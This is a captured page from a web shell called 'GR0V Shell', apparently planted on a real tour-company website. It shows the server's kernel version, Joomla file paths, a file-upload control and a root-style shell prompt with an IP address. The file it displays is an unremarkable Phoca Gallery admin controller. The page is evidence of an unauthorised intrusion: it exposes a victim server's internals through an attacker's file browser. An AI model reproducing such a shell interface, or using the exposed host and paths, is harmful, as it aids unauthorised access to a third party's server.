? GR0V Shell

GR0V shell

Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64

Path : /home/admin/public_html/old/administrator/components/com_phocagallery/
File Upload :
Current File : /home/admin/public_html/old/administrator/components/com_phocagallery/controller.php

<?php
/*
 * @package Joomla 1.5
 * @copyright Copyright (C) 2005 Open Source Matters. All rights reserved.
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see LICENSE.php
 *
 * @component Phoca Gallery
 * @copyright Copyright (C) Jan Pavelka www.phoca.cz
 * @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
 */
jimport('joomla.application.component.controller');

// Submenu view
$view	= JRequest::getVar( 'view', '', '', 'string', JREQUEST_ALLOWRAW );
if ($view == '' || $view == 'phocagallerycp') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt');
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagallerys') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys', true);
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt');
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagallerycs') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs', true );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt');
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagalleryt') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt', true );
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagalleryra') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt');
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra', true);
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagalleryraimg') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt');
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg', true);
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagallerycos') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt' );
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos', true);
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagallerycoimgs') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt' );
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs', true);
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagalleryusers') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt' );
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers', true);
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin' );
}

if ($view == 'phocagalleryin') {
	JSubMenuHelper::addEntry(JText::_('Control Panel'), 'index.php?option=com_phocagallery');
	JSubMenuHelper::addEntry(JText::_('Images'), 'index.php?option=com_phocagallery&view=phocagallerys');
	JSubMenuHelper::addEntry(JText::_('Categories'), 'index.php?option=com_phocagallery&view=phocagallerycs' );
	JSubMenuHelper::addEntry(JText::_('Themes'), 'index.php?option=com_phocagallery&view=phocagalleryt' );
	JSubMenuHelper::addEntry(JText::_('Category Rating'), 'index.php?option=com_phocagallery&view=phocagalleryra');
	JSubMenuHelper::addEntry(JText::_('Image Rating'), 'index.php?option=com_phocagallery&view=phocagalleryraimg');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_CATEGORY_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycos');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_IMAGE_COMMENTS'), 'index.php?option=com_phocagallery&view=phocagallerycoimgs');
	JSubMenuHelper::addEntry(JText::_('PHOCAGALLERY_USERS'), 'index.php?option=com_phocagallery&view=phocagalleryusers');
	JSubMenuHelper::addEntry(JText::_('Info'), 'index.php?option=com_phocagallery&view=phocagalleryin',true );
}

class PhocaGalleryCpController extends JController
{
	function display() {
		parent::display();
	}
}
?>

T1KUS90T
  root-grov@210.1.60.28:~$